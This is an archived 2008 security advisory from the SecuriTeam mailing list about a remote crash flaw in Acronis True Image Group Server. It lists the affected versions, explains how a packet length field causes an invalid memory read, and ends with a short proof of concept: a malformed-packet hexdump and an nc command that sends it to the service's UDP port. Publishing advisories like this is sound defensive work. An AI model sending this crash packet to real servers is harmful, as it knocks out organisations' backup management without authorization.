Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [NT] Acronis True Image Group Server Invalid Memory Access |
|---|---|
| Date: | 10 Mar 2008 17:43:36 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Acronis True Image Group Server Invalid Memory Access ------------------------------------------------------------------------ SUMMARY <http://www.acronis.com/enterprise/products/ATIES/group-server.html> Acronis Group Server is a component of Acronis True Image Echo Server (Workstation and Enterprise packages) which "allows the viewing and managing of backup tasks for all systems in the network from the Acronis Management Console". A vulnerability in the way the Acronis True Image Group Server handles network based data allows remote attackers to cause the product to crash. DETAILS Vulnerable Systems: * Acronis True Image Group Server version 1.5.19.191 * Acronis True Image Enterprise Server version 9.5.0.8072 The packets used by this server contain some 16 bit fields which specify the length of the subsequent data. The problem is that the memory assigned for each packet is about 2048 bytes so the server allocates the amount of memory specified by that field and then tries to copy the data from the packet into this new buffer with the subsequent crash of the service due to the invalid read access. Exploit: The following hexdump will cause the server to crash: 0000000 ffff 0001 ffff ffff ffff ffff 0029 ffff 0000010 002a 0000 ffff ffff ffff ffff ffff ffff 0000020 ffff ffff ffff ffff ffff ffff ffff ffff * 0000800 When sent with the following command: nc SERVER 9877 -v -v -u -p 9876 < acrogroup.txt ADDITIONAL INFORMATION The information has been provided by <mailto:aluigi@autistici.org> Luigi Auriemma. The original article can be found at: <http://aluigi.altervista.org/adv/acrogroup-adv.txt> http://aluigi.altervista.org/adv/acrogroup-adv.txt ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [NT] MailEnable Professional/Enterprise Multiple Vulnerabilities, SecuriTeam |
|---|---|
| Next by Date: | [NT] NULL pointer in Acronis True Image Windows Agent, SecuriTeam |
| Previous by Thread: | [NT] MailEnable Professional/Enterprise Multiple Vulnerabilities, SecuriTeam |
| Next by Thread: | [NT] NULL pointer in Acronis True Image Windows Agent, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |